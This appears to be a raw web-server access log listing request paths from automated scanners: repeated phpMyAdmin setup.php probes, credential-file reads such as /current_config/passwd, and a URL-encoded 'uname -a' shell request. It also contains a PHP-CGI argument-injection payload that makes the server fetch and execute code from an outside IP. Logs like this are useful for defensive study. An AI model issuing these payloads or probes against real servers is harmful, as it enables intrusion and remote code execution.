/favicon.ico
/script/live.js
/recordings/
/phpmyadmin/scripts/setup.php
http://180.163.113.82/check_proxy
/redirect.php
/favicon.ico
/phpmyadmin/scripts/setup.php
/meta-release-lts
/favicon.ico
/favicon.ico
/recordings/
/phpmyadmin/scripts/setup.php
/muieblackcat
/:8080/scripts/setup.php
/:8080/admin/scripts/setup.php
/:8080/admin/pma/scripts/setup.php
/:8080/myadmin/scripts/setup.php
/:8080/mysql/scripts/setup.php
/:8080/phpadmin/scripts/setup.php
/:8080/pma/scripts/setup.php
/:8080/blog/phpmyadmin/scripts/setup.php
/:8080/php/phpmyadmin/scripts/setup.php
/:8080/phpmyadmin/scripts/setup.php
/:8080/phpMyAdmin2/scripts/setup.php
/:8080/dbadmin/scripts/setup.php
/:8080/admin/sql/scripts/setup.php
/:8080/database/sql/scripts/setup.php
/:8080/web/phpmyadmin/scripts/setup.php
/:8080/php/scripts/setup.php
/:8080/admin/phpmyadmin/scripts/setup.php
/:8080/php/phpmyadmin/scripts/setup.php
/:8080/db/scripts/setup.php
/:8080/admin/mysql/scripts/setup.php
http://httpheader.net/
/phpmyadmin/scripts/setup.php
/robots.txt
/sitemap.xml
/favicon.ico
/phpmyadmin/scripts/setup.php
/robots.txt
/sitemap.xml
/phpmyadmin/scripts/setup.php
/meta-release-lts
/x
/robots.txt
/phpmyadmin/scripts/setup.php
/robots.txt
/system.ini?loginuse&loginpas
/phpmyadmin
/favicon.ico
http://httpheader.net/
/favicon.ico
/phpmyadmin/scripts/setup.php
/favicon.ico
/phpmyadmin/scripts/setup.php
/phpmyadmin/scripts/setup.php
/meta-release-lts
/current_config/passwd
/current_config/passwd
/current_config/passwd
/current_config/Account1
/current_config/passwd
/favicon.ico
http://180.163.113.82/check_proxy
/favicon.ico
/cgi-bin/php?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin.simulation%3Don+-d+max_execution_time%3D0+-d+disable_functions%3D\"\"+-d+open_basedir%3Dnone+-d+auto_prepend_file%3Dhttp://191.96.249.97/ok.txt+-d+cgi.force_redirect%3D0+-d+cgi.redirect_status_env%3D0+-n
/ok.txt+-d+cgi.force_redirect=0+-d+cgi.redirect_status_env=0+-n
/style.css
/favicon.ico
/manager/html
/maque66959401/index.jsp
http://httpheader.net/
/current_config/passwd
/current_config/Account1
/phpmyadmin
/favicon.ico
/current_config/Account1
/phpmyadmin/scripts/setup.php
/cgi-bin/php?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin.simulation%3Don+-d+max_execution_time%3D0+-d+disable_functions%3D\"\"+-d+open_basedir%3Dnone+-d+auto_prepend_file%3Dhttp://191.96.249.97/ok.txt+-d+cgi.force_redirect%3D0+-d+cgi.redirect_status_env%3D0+-n
/ok.txt+-d+cgi.force_redirect=0+-d+cgi.redirect_status_env=0+-n
/favicon.ico
http://httpheader.net/
/phpmyadmin/scripts/setup.php
/muieblackcat
//scripts/setup.php
//admin/scripts/setup.php
//admin/pma/scripts/setup.php
//myadmin/scripts/setup.php
//mysql/scripts/setup.php
//phpadmin/scripts/setup.php
//pma/scripts/setup.php
//blog/phpmyadmin/scripts/setup.php
//php/phpmyadmin/scripts/setup.php
//phpmyadmin/scripts/setup.php
//phpMyAdmin2/scripts/setup.php
//dbadmin/scripts/setup.php
//admin/sql/scripts/setup.php
//database/sql/scripts/setup.php
//web/phpmyadmin/scripts/setup.php
//php/scripts/setup.php
//admin/phpmyadmin/scripts/setup.php
//php/phpmyadmin/scripts/setup.php
//db/scripts/setup.php
//admin/mysql/scripts/setup.php
//administrator/components/com_joommyadmin/phpmyadmin/scripts/setup.php
//admn/scripts/setup.php
//apache-default/phpmyadmin/scripts/setup.php
//blog/phpmyadmin/scripts/setup.php
//forum/phpmyadmin/scripts/setup.php
//htdocs/scripts/setup.php
//httpdocs/scripts/setup.php
//php/scripts/setup.php
//php/phpmyadmin/scripts/setup.php
//xampp/phpmyadmin/scripts/setup.php
//websql/scripts/setup.php
/phpmyadmin
http://httpheader.net/
http://httpheader.net/
/shell?%75%6E%61%6D%65%20%2D%61
/robots.txt
/sitemap.xml
/phpmyadmin
/robots.txt
/cgi-bin/php?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin.simulation%3Don+-d+max_execution_time%3D0+-d+disable_functions%3D\"\"+-d+open_basedir%3Dnone+-d+auto_prepend_file%3Dhttp://191.96.249.97/ok.txt+-d+cgi.force_redirect%3D0+-d+cgi.redirect_status_env%3D0+-n
/ok.txt+-d+cgi.force_redirect=0+-d+cgi.redirect_status_env=0+-n
/meta-release-lts
/phpmyadmin/scripts/setup.php
